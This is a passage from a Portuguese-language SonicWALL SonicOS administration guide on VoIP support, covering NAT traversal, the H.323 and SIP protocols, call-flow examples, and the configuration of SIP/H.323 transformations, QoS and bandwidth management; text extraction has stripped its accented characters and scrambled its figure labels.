origem com traduo de endereo de rede (NAT), difcil para VoIP atravessar efetivamente
um firewall padro. Aqui esto alguns dos motivos.
O VoIP opera usando dois protocolos separados - uma sinalizao de protocolo (entre
o cliente e o servidor VoIP) e um protocolo de mdia (entre os clientes). Os pares de porta/
endereo IP usados pelos protocolos de mdia (RTP/RTCP) para cada sesso so
negociados dinamicamente pelos protocolos de sinalizao. Os firewalls precisam rastrear
e manter dinamicamente essas informaes, abrir portas selecionadas para as sesses de
forma segura e fech-las no momento adequado.
Vrias portas de mdia so negociadas dinamicamente atravs da sesso de
sinalizao - as negociaes das portas de mdia esto contidas na carga dos protocolos
de sinalizao (informaes da porta e endereo IP). Os firewalls precisam executar
inspeo profunda de pacotes em cada pacote para obter as informaes e manter
dinamicamente as sesses, exigindo assim processamento adicional de um firewall.
Endereos IP de origem e destino incorporados aos pacotes de sinalizao de VoIP
- um firewall que suporta NAT traduz endereos IP e portas no nvel do cabealho IP para
os pacotes. Os firewalls de NAT totalmente simtricos ajustam suas ligaes de NAT com
frequncia e podem, arbitrariamente, fechar os buracos que permitem que os pacotes de
entrada passem na rede que eles protegem, eliminando a capacidade do provedor de
servios de enviar chamadas de entrada ao cliente. Para oferecer suporte ao VoIP de
forma efetiva necessrio para um firewall de NAT realizar a inspeo profunda de
pacotes e a transformao de endereos IP incorporados e informaes de porta,
conforme os pacotes atravessarem o firewall.
Os firewalls necessrios para processar os conjuntos de protocolo de sinalizao
que consiste em diferentes formatos de mensagens usadas por diferentes sistemas
VoIP - apenas porque dois fornecedores usam o mesmo conjunto de protocolos no
significa, necessariamente, que eles se interoperaro.
Para superar muitos dos obstculos introduzidos pelas complexidades de VoIP e NAT, os
fornecedores esto oferecendo SBCs (controladores de borda de sesso). Um SBC fica do
lado de Internet de um firewall e tenta controlar a borda de uma rede de VoIP, encerrando e
originando novamente todas as mdias de VoIP e trfego de sinalizao. Basicamente, os

SBCs atuam como um proxy para o trfego de VoIP para firewalls habilitados no VoIP. Os
dispositivos de segurana de rede de Dell SonicWALL so firewalls habilitados VoIP que
eliminarem a necessidade de um SBC na rede.
Nota VoIP tem suporte em todos os dispositivos Dell SonicWALL que podem executar SonicOS
6.1, desde que o aplicativo VoIP seja compatvel com RFC.
Protocolos de VoIP
As tecnologias VoIP so criadas em dois protocolos primrio(s), H.323 e SIP.
H.323
O H.323 um padro desenvolvido pela International Telecommunications Union (ITU). Ele
um conjunto abrangente de protocolos para comunicao de voz, vdeo e dados entre
computadores, terminais, dispositivos de rede e servios de rede. O H.323 projetado para
permitir que os usurios faam chamadas telefnicas multimdia ponto a ponto em redes de
comutao de pacotes sem conexo, como redes IP privadas e a Internet. O H.323
amplamente suportado por fabricantes de equipamentos de videoconferncia, equipamentos
VoIP e software e dispositivos de telefonia na Internet.
O H.323 utiliza uma combinao de TCP e UDP para a sinalizao e ASN.1 para codificao
de mensagens. O H.323v1 foi lanado em 1996 e o H.323v5 foi lanado em 2003. Conforme o
padro mais antigo, o H.323 foi adotado por vrios usurios de VoIP antecipadamente.
Uma rede H.323 consiste em quatro tipos diferentes de entidades:
Terminais - pontos de terminais do cliente para comunicaes de multimdia. Um exemplo
seria um telefone de Internet ou PC habilitado por H.323.
Gatekeepers - executa servios para configurao e derrubada de chamada e registro de
terminais H.323 para comunicaes. Inclui:
Traduo de endereo.
RAS (Registro, controle de admisso e status).
O ILS (Internet Locator Service) tambm est nesta categoria (embora no faa parte
do H.323). O ILS usa o LDAP (Lightweight Directory Access Protocol), em vez de
mensagens de H.323.
MCUs (unidades de controle de vrios pontos) - distribuio de dados e controle de
conferncia para comunicaes de vrios pontos entre terminais.
Gateways - interoperao entre redes H.323 e outros servios de comunicaes, como a
PSTN (Packet Switched Telephone Network) comutada por circuito.
SIP
O padro de SIP (Protocolo de Iniciao de Sesso) foi desenvolvido pela Internet Engineering
Task Force (IETF). RFC 2543 foi liberada em maro de 1999. RFC 3261 foi liberada em junho
de 2002. SIP um protocolo de sinalizao para iniciar, gerenciar e encerrar sesses. SIP
oferece suporte a mobilidade e 'presena' e pode ser executado em TCP (Protocolo de
Controle de Transmisso) e UDP (Protocolo de Datagrama de Usurio).

Usando um SIP, um cliente de VoIP pode iniciar e encerrar sesses de chamada , convidar
membros para uma sesso de conferncia e executar outras tarefas de telefonia. O SIP
tambm permite que PBXs (trocas de ramificao privadas), gateways de VoIP e outros
dispositivos de comunicaes se comuniquem em colaborao padronizada. O SIP tambm foi
projetado para evitar a sobrecarga intensa de H.323.
Uma rede SIP composta pelas entidades lgicas a seguir:
User Agent (UA) - inicia, recebe e encerra chamadas.
Servidor proxy - age em nome do UA no encaminhamento ou respondendo s
solicitaes. Um servidor proxy pode bifurcar solicitaes para vrios servidores. Um back-
to-back user agent (B2BUA) um tipo de servidor proxy que trata cada segmento de uma
chamada que passa por ele como duas sesses de chamada SIP distintas: uma entre ele
e o telefone chamador e a outra entre ele e o telefone chamado. Outro servidores proxies
tratam todos os segmentos da mesma chamada como uma nica sesso de chamada SIP.
Redirecionar servidor - responde solicitao, mas no encaminha solicitaes.
Servidor de registro - Lida com a autenticao e registro do UA.
Recursos de VoIP da SonicWALL

As sees a seguir descrevem o servio integrado de VoIP da SonicWALL:
Segurana VoIP na pgina 776
Rede de VoIP na pgina 777
Interoperabilidade de rede de VoIP na pgina 778
Protocolos de VoIP com suporte na pgina 779
Como o SonicOS trata as chamadas de VoIP na pgina 781
Segurana VoIP
Legitimidade de trfego - inspeo estvel de cada pacote de sinalizao e mdia de VoIP
que atravessa o firewall garante que todo o trfego seja legtimo. Os pacotes que exploram
falhas de implementao, causando efeitos como estouros de buffer no dispositivo de
destino, so as armas de escolha para vrios invasores. Os dispositivos de segurana de
rede da Dell SonicWALL detectam e descartam pacotes malformados e invlidos antes que
eles atinjam seu destino pretendido.
Proteo da camada de aplicativo para protocolos VoIP - Proteo completa contra
exploraes de VoIP de nvel de aplicativo por meio do IPS (Intrusion Prevention Service)
da SonicWALL. O IPS integra um mecanismo de varredura configurvel e de alto
desempenho com um banco de dados fornecido e atualizado dinamicamente de
assinaturas de ataques e vulnerabilidades para proteger redes contra cavalos de Troia
sofisticados e ameaas polimrficas. A SonicWALL estende seu banco de dados de
assinaturas IPS com uma famlia de assinaturas especficas VoIP projetada para impedir
que o trfego mal-intencionado acesse servidores e telefones VoIP protegidos.
Proteo contra ataque DoS e DDoS - preveno de ataques DoS e DDoS, como o
ataque SYN Flood, Ping of Death e LAND (IP), que so projetados para desabilitar uma
rede ou servio.
Validar a sequncia de pacotes para pacotes de sinalizao de VoIP que usam TCP
para no permitir pacotes fora de sequncia e retransmitidos alm da janela.
Usar nmeros aleatrios de sequncia TCP (gerados por um gerador de nmero
aleatrio criptogrfico durante a configurao de conexo) e validar o fluxo de dados
em cada sesso TCP para impedir ataques de insero de dados e de reproduo.

Garante que os invasores no possam sobrecarregar um servidor ao tentar abrir
muitas conexes TCP/IP (que nunca so, geralmente, totalmente estabelecidas devido
a um endereo de origem falso), usando a proteo contra SYN Flood.
Monitoramento estvel - o monitoramento estvel garante que os pacotes, mesmo que
apaream vlido por si mesmos, sejam apropriados para o estado atual da sua conexo
VoIP associada.
Suporte de dispositivo de VoIP criptografado - a SonicWALL oferece suporte a
dispositivos de VoIP capazes de usar criptografia para proteger a troca de mdia em uma
conversa de VoIP ou dispositivos VoIP seguros que no oferecem suporte mdia
criptografada usando VPNs IPsec para proteger chamadas VoIP.
Proteo da camada de aplicativo - a SonicWALL oferece proteo completa contra
exploraes de VoIP de nvel de aplicativo por meio do IPS (Intrusion Prevention Service)
da SonicWALL. O IPS da SonicWALL criado em um mecanismo de inspeo profunda de
pacotes configurveis e de alto desempenho que oferece proteo estendida de servios
de rede de chave incluindo VoIP, servios do Windows e DNS. O idioma da assinatura
extensvel usado no mecanismo de inspeo profunda de pacotes da Dell SonicWALL
tambm fornece defesa proativa contra vulnerabilidades de protocolos e aplicativos
descobertos recentemente. A granularidade de assinatura permite que a SonicWALL IPS
detecte e impea ataques com base em ataques de grupo, global ou de base por
assinatura para fornecer flexibilidade mxima e controlar o nmero de falsos positivos.
Rede de VoIP
VoIP sobre LAN sem fio (WLAN) - a SonicWALL estende a segurana VoIP completa para
redes conectadas sem fio com sua soluo sem fio distribuda. Todos os recursos de
segurana fornecidos para dispositivos VoIP conectados a uma rede cabeada atrs de
uma SonicWALL tambm so fornecidos aos dispositivos de VoIP que usam uma rede sem
fio.
Nota A soluo sem fio segura da SonicWALL inclui os ativadores de rede para estender
comunicaes de VoIP seguras em redes sem fio. Consulte o guia Solues integradas de
rede sem fio segura da Dell SonicWALL disponvel no site da Dell SonicWALL
http://www.sonicwall.com para obter informaes completas.
BWM (Gerenciamento de largura de banda) e QoS (qualidade de servio) - o

gerenciamento de largura de banda (ingresso e egresso) pode ser usado para garantir que
largura de banda permanea disponvel para o trfego de VoIP sensvel ao tempo. O BWM
integrado aos recursos de QoS (qualidade de servio) da SonicWALL para fornecer a
previsibilidade que vital a determinados tipos de aplicativos.
Redundncia de WAN e balanceamento de carga - a redundncia de WAN e
balanceamento de carga permite a uma interface agir como uma porta secundria de WAN.
Esta porta secundria de WAN poder ser usada em uma configurao ativa/passiva
simples, em que o trfego apenas roteado atravs dela, se a porta primria de WAN
estiver inativa ou indisponvel. O balanceamento de carga pode ser executado dividindo o
roteamento de trfego com base no destino.
Alta disponibilidade - a alta disponibilidade fornecida pela alta disponibilidade do
SonicOS, que garante conectividade contnua e confivel em caso de falha do sistema.

Interoperabilidade de rede de VoIP
Plugar e proteger suporte para dispositivos de VoIP - com o SonicOS, as adies,
alteraes e remoes de dispositivo de VoIP so manipulados automaticamente,
garantindo que nenhum dispositivo de VoIP fique desprotegido. Usando o monitoramento
e rastreamento de tecnologia avanada, um dispositivo de VoIP ser protegido
automaticamente, assim que ele estiver conectado rede atrs de um firewall.
Validao de sintaxe completa de todos os pacotes de sinalizao de VoIP - os
pacotes de sinalizao recebidos so totalmente analisados no SonicOS para garantir sua
conformidade com a sintaxe definida dentro de seu padro associado. Ao executar a
validao de sintaxe, o firewall poder garantir que pacotes malformados no tenham
permisso para passar pelo destino pretendido recebido e afet-lo adversamente.
Suporte para configurao dinmica e rastreamento de fluxos de mdia - o SonicOS
rastreia cada chamada de VoIP do primeiro pacote de sinalizao que solicita uma
configurao de chamada, at o ponto no qual a chamada finalizada. Apenas com base
no processo de chamada bem-sucedida so as portas adicionais abertas (para troca de
sinalizao e mdia adicional) entre a chamada e parte da chamada.
As portas de mdia que so negociadas como parte da configurao da chamada so
atribudas dinamicamente pelo firewall. As chamadas subsequentes, at mesmo entre as
partes iguais, usaro portas diferentes, frustrando um invasor que pode estar monitorando
portas especficas. As portas necessrias de mdia sero abertas apenas quando a
chamada for totalmente conectada e sero encerradas no trmino da chamada. O trfego
que tenta usar as portas externas da chamada descartado, fornecendo proteo
adicional para os dispositivos de VoIP atrs do firewall.
Validao de cabealhos para todos os pacotes de mdia - o SonicOS examina e
monitora os cabealhos em pacotes de mdia para permitir a deteco e descartar os
pacotes fora de sequncia e retransmitidos (alm da janela). Alm disso, assegurando que
exista um cabealho vlido, os pacotes de mdia invlidos sero detectados e descartados.
Controlando os fluxos de mdia, bem como a sinalizao, a SonicWALL fornecer proteo
para toda a sesso de VoIP.
Tempos limite de inatividade configurvel de sinalizao e mdia - para garantir que
as conexes de VoIP descartadas no permaneam abertas indefinidamente, o SonicOS
monitora o uso de fluxos de mdia e sinalizao associados a uma sesso de VoIP. Os
fluxos inativos alm do tempo limite configurado so encerrados, para evitar falhas de
segurana potenciais.
O SonicOS permite ao administrador controlar as chamadas de entrada - exigindo que
todas as chamadas recebidas sejam autorizadas e autenticadas pelo Gatekeeper H.323
ou Proxy SIP, o SonicOS pode bloquear chamadas no autorizadas e de spam. Isso
permite ao administrador certificar-se de que a rede de VoIP esteja sendo usada apenas
para as chamadas autorizadas pela empresa.
Monitoramento e gerao de relatrios abrangente - para todos os protocolos VoIP com
suporte, o SonicOS oferece ferramentas extensivas de monitoramento e de soluo de
problemas:
Relatrios dinmicos em tempo real de chamadas de VoIP ativas, indicando o
chamador e as partes da chamada e a largura de banda usada.
Logs de auditoria de todas as chamadas de VoIP, indicando o chamador e as partes da
chamada, durao da chamada e largura de banda total usada. Criao de log de
pacotes anormais vistos (como uma resposta no confivel) com os detalhes das
partes envolvidas e condio vista.
Relatrios detalhados de syslog e relatrios do ViewPoint para fluxos de mdia e de
sinalizao de VoIP. SonicWALL ViewPoint uma ferramenta de relatrio grfico
baseado na Web que fornece relatrios detalhados e abrangentes da segurana e
atividades de rede com base em fluxos de dados de syslog recebidos do firewall. Os

relatrios podem ser gerados sobre praticamente qualquer aspecto da atividade do
firewall, incluindo padres de uso de usurio individual ou de grupo e eventos em
firewalls especficos ou em grupos de firewalls, tipos e perodos de ataques, consumo
de recursos e restries, etc.
Protocolos de VoIP com suporte

Os dispositivos de segurana de rede da Dell SonicWALL suportam transformaes para os
seguintes protocolos.
H.323
O SonicOS fornece o seguinte suporte para H.323:
Os dispositivos VoIP que executam todas as verses de H.323 (atualmente de 1 a 5) so
suportados
ILS (Internet Locator Service) com base em LDAP da Microsoft
Descoberta de Gatekeeper por terminais H.323 de LAN usando a difuso seletiva
Monitoramento e processamento estvel de registro de mensagens de registro, admisso
e status (RAS) do Gatekeeper
Suporte para terminais H.323 que usam criptografia para os fluxos de mdia
Opo 150 do DHCP. O servidor DHCP pode ser configurado para retornar o endereo de
um servidor TFTP especfico VoIP para clientes DHCP
Alm do suporte H.323, o SonicOS oferece suporte aos dispositivos de VoIP usando os
seguintes padres ITU adicionais:
T.120 para compartilhamento de aplicativo, lousas eletrnicas, troca de arquivo e bate-
papo
H.239 para permitir vrios canais para fornecimento de udio, vdeo e dados
H.281 para controle de cmera remota (FECC)
SIP
O SonicOS fornece o seguinte suporte para SIP:
Base padro SIP (RFC 2543 e RFC 3261)
Mtodo de SIP INFO (RFC 2976)
Confiabilidade de respostas provisrias no SIP (RFC 3262)
Notificao de evento especfico de SIP (RFC 3265)
Mtodo de ATUALIZAO de SIP (RFC 3311)
Opo de DHCP para servidores SIP (RFC 3361)
Extenso IP para mensagens instantneas (RFC 3428)
Mtodo de REFERNCIA de SIP (RFC 3515)
Extenso do SIP para roteamento de resposta simtrica (RFC 3581)

Interoperabilidade de fornecedor de VoIP da SonicWALL
A seguir est uma lista parcial de dispositivos de fabricantes lderes com os quais o VoIP da
SonicWALL interopera.
H.323 SIP
Soft phones: Soft phones:
Avaya Apple iChat
Microsoft NetMeeting Avaya
OpenPhone Microsoft MSN Messenger
PolyCom Nortel Multimedia PC Client
SJLabs SJ Phone PingTel Instant Xpressa
PolyCom
Telefones/videofones: Siemens SCS Client SJLabs
Avaya SJPhone
Cisco XTen X-Lite
D-Link Ubiquity SIP User Agent
PolyCom
Sony Telefones/ATAs:
Avaya
Gatekeepers: Cisco
Cisco Grandstream BudgetOne
OpenH323 Gatekeeper Mitel
Packet8 ATA
Gateway PingTel Xpressa PolyCom
Cisco PolyCom
Pulver Innovations WiSIP
SoundPoint
Proxies/Servios SIP:
Servidor Proxy SIP Cisco
Proxy SIP Brekeke Software OnDo
Packet8
Proxy SIP Siemens SCS
Vonage
CODECs
O SonicOS oferece suporte a fluxos de mdia de qualquer CODEC - os fluxos de mdia
transportam sinais de udio e vdeo que foram processados por um hardware/software CODEC
(COdificador/DECodificador) no dispositivo de VoIP. Os CODECs usam tcnicas de
codificao e compactao para reduzir a quantidade de dados necessrios para representar
sinais de udio e vdeo. Alguns exemplos de CODECs so:
H.264, H.263 e H.261 para vdeo
MPEG4, G.711, G.722, G.723, G.728, G.729 para udio
Protocolos VoIP nos quais o SonicOS no executa a inspeo profunda de pacotes

Os dispositivos de segurana de rede da Dell SonicWALL no suportam atualmente a inspeo
profunda de pacotes para os seguintes protocolos, portanto, esses protocolos apenas devero
ser usados em ambientes no NAT.
Extenses proprietrias para H.323 ou SIP
MGCP
Megaco/H.248
Cisco Skinny Client Control Protocol (SCCP)
IP-QSIG

Protocolos proprietrios (MiNET do Mitel, 3Com NBX, etc.)
Como o SonicOS trata as chamadas de VoIP

O SonicOS fornece uma soluo eficiente e segura para todos os cenrios de chamada de
VoIP. A seguir esto exemplos de como o SonicOS lida com fluxos de chamadas de VoIP.
Chamadas de Entrada
A figura a seguir mostra a sequncia de eventos que ocorrem durante uma chamada de
entrada.
+%9
3IGNALING
-EDIA
Phone
A
VOIP Server
5 2
3
Internet
.ETWORK3ECURITY!PPLIANCE %
NSA Appliance
6
Phone
B 4
O seguinte descreve a sequncia de eventos mostrados na figura acima:

1. Registros de telefone B com o servidor VoIP - o firewall cria um banco de dados de
telefones IP acessveis atrs dele, monitorando as solicitaes de registro de VoIP de
sadas. O SonicOS traduz entre o endereo IP privado do telefone B e o endereo IP
pblico do firewall usado nas mensagens de registro. O servidor VoIP no tem
conhecimento de que o telefone B est atrs de um firewall e tem um endereo IP privado ele
associa o telefone B ao endereo IP pblico do firewall.
2. O telefone A inicia uma chamada para o telefone B - o telefone A inicia uma chamada
para o telefone B usando um nmero de telefone ou alias. Ao enviar essas informaes
para o servidor VoIP, ele tambm fornecer detalhes sobre os formatos e tipos de mdia
que pode suportar, bem como os endereos IP e portas correspondentes.
3. O servidor VoIP valida a solicitao de chamada e envia a solicitao ao telefone B -
o servidor VoIP envia a solicitao de chamada ao endereo IP pblico do firewall. Ao
atingir o firewall, o SonicOS valida a origem e o contedo da solicitao. O firewall, em
seguida, determina o endereo IP privado do telefone B.
4. O telefone B toca e atendido - quando o telefone B for atendido, ele retornar
informaes ao servidor VoIP para os tipos e formatos de mdia suportados, bem como os
endereos IP e as portas correspondentes. O SonicOS traduz essas informaes de IP
privado para usar o endereo IP pblico do firewall das mensagens para o servidor VoIP.

5. O servidor VoIP retorna as informaes IP de mdia do telefone B ao telefone A -
agora, o telefone A tem informaes suficientes para iniciar a troca de mdia com o telefone
B. O telefone A no sabe que o telefone B est atrs de um firewall, visto que o endereo
pblico do firewall foi fornecido pelo servidor VoIP.
6. O telefone A e o telefone B trocam udio/vdeo/dados por meio do servidor VoIP -
usando o banco de dados interno, o SonicOS garante que a mdia proveniente do Telefone
A esteja usando apenas os fluxos de mdia especficos permitidos pelo Telefone B.
Chamadas locais
A figura a seguir mostra a sequncia de eventos que ocorrem durante uma chamada de VoIP
local.
+%9
3IGNALING
-EDIA
VOIP Server
6 2
Internet
02/
PRO 5060
4
1 3
Phone Phone
A 7 B 5
O seguinte descreve a sequncia de eventos mostrados na figura acima:

1. Registro dos telefones A e B com o servidor VoIP -o firewall cria um banco de dados
dos telefones IP acessveis atrs dele, monitorando as solicitaes de registro de VoIP de
sada. O SonicOS traduz entre endereos IP privados dos telefones e o endereo IP
pblico do firewall. O servidor VoIP est ciente de que os telefones esto atrs de um
firewall. Ele associa o mesmo endereo IP para ambos os telefones, mas nmeros de
portas diferentes.
2. O telefone A inicia uma chamada para o telefone B enviando uma solicitao para o
servidor VoIP - mesmo que eles estejam atrs do mesmo firewall, o telefone A no sabe
o endereo IP do telefone B. O telefone A inicia uma chamada para o telefone B usando
um nmero de telefone ou alias.
3. O servidor VoIP valida a solicitao de chamada e envia a solicitao ao telefone B -
o servidor VoIP envia a solicitao de chamada ao endereo IP pblico do firewall. O
firewall determina de endereo IP privado do telefone do B.
4. O telefone B toca e atendido - quando o telefone B for atendido, o firewall traduzir suas
informaes de IP privado para usar o endereo IP pblico do firewall das mensagens para
o servidor VoIP.

5. O servidor VoIP retorna as informaes IP da mdia do telefone B para o telefone A -
as chamadas e as informaes de partes da chamadas nas mensagens so traduzidas
pelo SonicOS de volta para os endereos privados e as portas para um telefone A e um
telefone B.
6. O telefone A e o telefone B trocam diretamente vdeo/udio/dados - o firewall roteia o
trfego diretamente entre os dois telefones atravs da LAN. Conectar diretamente as dois
telefones reduz os requisitos de largura de banda para transmitir dados ao servidor VoIP
e elimina a necessidade do firewall para a executar a traduo de endereo.
Configuraes de VoIP
As sees a seguir fornecem informaes sobre configuraes de VoIP:
Configurando recursos de VoIP da SonicWALL na pgina 783
Configurando recursos de VoIP da SonicWALL

Configurar o dispositivo de segurana de rede da Dell SonicWALL para construes de
implantaes de VoIP na configurao bsica da rede na interface de gerenciamento da Dell
SonicWALL. Esta seo pressupe que o dispositivo de segurana de rede da Dell SonicWALL
est configurado para seu ambiente de rede.
Interfaces com suporte

Os dispositivos de VoIP so suportados em zonas de SonicOS a seguir:
Zonas confiveis (LAN, VPN)
Zonas no confiveis (WAN)
Zonas pblicas (DMZ)
Zonas sem fio (WLAN)
Tarefas de configurao
Configurao de VoIP na pgina 784
Configuraes gerais na pgina 784
Configuraes de SIP na pgina 785
Configuraes H.323 na pgina 786
Configurao de QoS e BWM na pgina 787
Qualidade de servio na pgina 787
Configurando a largura de banda na Interface de WAN na pgina 788
Configurando regras de acesso de VoIP na pgina 789
Configurando a criao de log do VoIP na pgina 790

Configurao de VoIP
O SonicOS inclui as definies de configurao de VoIP na pgina VoIP > Configuraes.
Esta pgina est dividida em trs sees de definies de configurao: Configuraes
gerais, Configuraes de SIP e Configuraes de H.323.
Configuraes gerais
Habilitar NAT consistente

Para habilitar NAT consistente, selecione a opo Habilitar NAT consistente e clique em
Aceitar. Esta opo est habilitada, por padro.
A NAT consistente aumenta a poltica NAT padro para fornecer uma maior compatibilidade
com aplicativos ponto a ponto que exigem um endereo IP para se conectar, como o VoIP. Ela
usa um mtodo de hash MD5 para atribuir de forma consistente o mesmo endereo IP pblico
mapeado e par de Portas UDP a cada endereo IP privado interno e um par de portas.
Por exemplo, a NAT pode converter os endereos IP (LAN) privados e os pares de portas IP,
192.116.168.10/50650 e 192.116.168.20/50655 em pares de portas/IP (WAN) pblicas da
seguinte forma:
Porta/IP pblico
Porta/IP pblico convertido
192.116.168.10/50650 64.41.140.167/40004
192.116.168.20/50655 64.41.140.167/40745

Com a NAT consistente habilitada, todas as solicitaes posteriores do host 192.116.168.10
ou 192.116.168.20 que usem as mesmas portas ilustradas anteriormente resultam no uso dos
mesmos pares de portas e endereos convertidos. Sem a NAT consistente, a porta e
provavelmente o endereo IP so alterados a cada solicitao.
Nota Habilitar a NAT consistente causa uma ligeira diminuio na segurana global, devido ao
aumento da previsibilidade dos pares de portas e endereos. A maioria dos aplicativos
baseados em UDP so compatveis com a NAT tradicional. Portanto, no habilite a NAT
consistente a menos que sua rede use aplicativos que a solicitem.
Configuraes de SIP
Por padro, os clientes SIP usam seu endereo IP privado nas mensagens de SDP (Session
Definition Protocol) do SIP que so enviadas ao proxy SIP. Se o proxy SIP estiver localizado
no lado (WAN) pblico do firewall e os clientes SIP estiverem localizados no lado (LAN) privado
do firewall, as mensagens de SDP no sero traduzidas e o proxy SIP no poder alcanar os
clientes SIP.
Selecionar Habilitar transformaes de SIP transforma mensagens de SIP entre LAN
(confivel) e WAN/DMZ (no confivel). Ser necessrio verificar esta configurao ao desejar
que o firewall faa a transformao de SIP. Se o proxy SIP estiver localizado no lado (WAN)
pblico do firewall e os clientes SIP estiverem no lado de LAN, por padro, os clientes SIP
incorporaro/usaro seu endereo IP privado nas mensagens de SDP (SIP/Session Definition
Protocol) enviadas ao proxy SIP, portanto, essas mensagens no sero alteradas e o proxy SIP
no saber como voltar ao cliente atrs do firewall. Selecionar Habilitar transformaes de
SIP permite que o firewall percorra cada mensagem de SIP e altere o endereo IP privado e a
porta atribuda. Habilitar transformao de SIP tambm controla e abre as portas RTP/RTCP
que precisam ser abertas para que as chamadas de sesso de SIP ocorra. O NAT traduz os
endereos da camada trs, mas no os endereos de camada sete SIP/SDP, o motivo pelo
qual necessrio selecionar Habilitar transformaes de SIP para transformar as mensagens
de SIP.
Dica Em geral, deve-se verificar a caixa Habilitar transformaes de SIP, a menos que haja
outra soluo transversal de NAT que requer que esse recurso seja desativado. As
transformaes de SIP funcionam no modo bidirecional, significando que as mensagens
so transformadas indo da LAN para a WAN e vice-versa.
Selecionar Permitir pacotes no SIP na porta de sinalizao permite os aplicativos, como

Apple iChat e MSN Messenger, que usam porta de sinalizao de SIP para mensagens
proprietrias adicionais. Habilitar esta caixa de seleo pode abrir a rede para ataques mal-
intencionados causados pelo trfego de SIP malformado ou invlido. Esta caixa de seleo
est habilitada, por padro.

A configurao Habilitar o suporte de SIP Back-to-Back User Agent (B2BUA) dever ser
habilitada quando o firewall puder ver ambos os trechos de uma chamada de voz (por exemplo,
quando um telefone na LAN chamar outro telefone na LAN). Esta configurao dever ser
habilitada apenas quando o servidor proxy SIP estiver sendo usado como um B2BUA.
Dica Se no houver nenhuma possibilidade do firewall ver ambos os trechos de chamadas de

voz (por exemplo, apenas quando as chamadas forem feitas e recebidas de telefones na
WAN), a configurao Habilitar o suporte de SIP Back-to-Back User Agent (B2BUA)
dever ser desabilitada para evitar o uso desnecessrio de CPU.
O Limite de tempo de inatividade de sinalizao de SIP (segundos) e o Limite de tempo

de inatividade de mdia de SIP (segundos) definem a quantidade de tempo que uma
chamada pode ficar inativa (sem trfegos trocados) antes que o firewall bloqueie o trfego
adicional. Uma chamada ficar inativa quando colocada em espera. O valor de tempo padro
de Tempo limite de inatividade de sinalizao de SIP 1800 segundos (30 minutos). O valor
de tempo padro do Tempo limite de inatividade de mdia de SIP 120 segundos (2
minutos).
A configurao Porta de sinalizao de SIP adicional (UDP) para transformaes permite
especificar uma porta UDP no padro usada para transportar o trfego de sinalizao de SIP.
Normalmente, o trfego de sinalizao de SIP executado na porta UDP 5060. No entanto,
vrios servios de VOIP comercial usam portas diferentes, como 1560. Usando essa
configurao, o dispositivo de segurana executa transformao de SIP nessas portas no
padro.
Dica O servio de VoIP da Vonage usa a porta UDP 5061.
Configuraes H.323
Selecione Habilitar transformao de H.323 na seo Configuraes de H.323 e clique em

Aceitar para permitir inspeo de contedo do pacote de reconhecimento de protocolo H.323
estvel e modificao pelo firewall. O firewall executa qualquer endereo IP dinmico e
mapeamento de porta de transporte nos pacotes de H.323, o que necessrio para a
comunicao entre as partes de H.323 em redes/zonas confiveis e no confiveis. Desabilite
a opo Habilitar transformao H.323 para ignorar o processamento especfico de H.323
executado pelo firewall.
Selecione Apenas aceitar chamadas recebidas do Gatekeeper para garantir que todas as
chamadas recebidas percorram o Gatekeeper para autenticao. O Gatekeeper recusar
chamadas que falhem na autenticao.
O campo Tempo limite de inatividade de sinalizao/mdia de H.323 (segundos) especifica
o perodo de tempo que uma chamada pode ficar inativa antes que o firewall bloqueie o trfego
adicional. Uma chamada ficar inativa quando colocada em espera. O valor de tempo padro
de Tempo limite de inatividade de sinalizao/mdia H.323 300 segundos (5 minutos).
O campo Endereo IP de Gatekeeper WAN/DMZ padro tem um valor padro de 0.0.0.0.
Insira o endereo IP de Gatekeeper H.323 padro neste campo para permitir que dispositivos
H.323 baseados em LAN descubram o Gatekeeper usando o endereo de difuso seletiva
225.0.1.41. Se voc no inserir um endereo IP, as mensagens de difuso seletiva
descobertas de dispositivos H.323 baseados em LAN iro percorrer o tratamento de difuso
seletiva configurado.

Configurao de QoS e BWM
Um dos maiores desafios para VoIP garantir a alta qualidade de voz em uma rede IP. O IP
foi projetado principalmente para trfego de dados assncronos, o que pode tolerar atraso.
VoIP, no entanto, muito sensvel a atraso e perda de pacotes. Gerenciamento de acesso e
priorizao de trfego so requisitos importantes para assegurar comunicaes de VoIP de
alta qualidade e em tempo real.
O gerenciamento de largura de banda (BWM) integrado e recursos de qualidade de Servio
(QoS) da SonicWALL fornecem as ferramentas para gerenciar a confiabilidade e a qualidade
das comunicaes do VoIP.

Para obter informaes sobre o Gerenciamento de Largura de Banda (BWM), consulte
Qualidade de servio
QoS abrange vrios mtodos destinados a fornecerem o desempenho e o comportamento de
rede previsvel. A previso de rede vital para VoIP e outros aplicativos de misso crtica.
Nenhuma quantidade de largura de banda pode fornecer esse tipo de previso, porque
qualquer quantidade de largura de banda, por fim, ser usada para sua capacidade em algum
ponto em uma rede. Apenas QoS, quando configurado e implementado corretamente, pode
gerenciar o trfego corretamente e garantir os nveis de servio de rede desejados.
O SonicOS inclui recursos de QoS que adicionam a capacidade de reconhecer, mapear,
modificar e gerar o 802.1p padro de mercado e designadores DSCP (Differentiated Services
Code Points) CoS (Class of Service).

Configurando a largura de banda na Interface de WAN
As configuraes de BWM comeam habilitando o BWM na interface de WAN relevante e
especificando a largura de banda disponvel na interface em Kbps. Isso executado na pgina
Rede > Interfaces, selecionando o cone Configurar para a interface de WAN e navegando
at a guia Avanado:
O BWM de egresso e de ingresso pode ser habilitado em conjunto ou separadamente nas

interfaces de WAN. Os valores de largura de banda diferentes podem ser inseridos para a
largura de banda de entrada e sada para links assimtricos de suporte. As taxas de link at
100.000 Kbps (100Mbit) podero ser declaradas na interface Fast Ethernet, enquanto as
interfaces Gigabit Ethernet suportarem taxas de link at 1.000.000 (Gigabit). A largura de
banda especificada dever refletir a largura de banda real disponvel para o link. Assinar o link
(ou seja, declarar um valor maior que a largura de banda disponvel) no recomendado.
Depois que uma ou ambas as configuraes de BWM estiverem habilitadas na interface de
WAN e a largura de banda disponvel tiver sido declarada, uma guia largura de banda
aparecer em Regras de acesso. Para obter mais informaes, consulte Configurando regras
de acesso de VoIP na pgina 789.
Para configurar o gerenciamento de largura de banda no dispositivo de segurana de rede da
Dell SonicWALL:

Etapa 1 Selecione Rede > Interfaces.
Etapa 2 Clique no cone Editar na coluna Configurar na linha WAN (X1) da tabela de Interfaces. A
janela Editar interface exibida.
Etapa 4 Verifique Habilitar gerenciamento de largura de banda de egresso (sada) e insira a largura
de banda disponvel no campo Gerenciamento de largura de banda de egresso da interface
disponvel.
Etapa 5 Verifique Habilitar gerenciamento de largura de banda de ingresso (entrada) e insira a
largura de banda disponvel no campo Gerenciamento de largura de banda de ingresso da
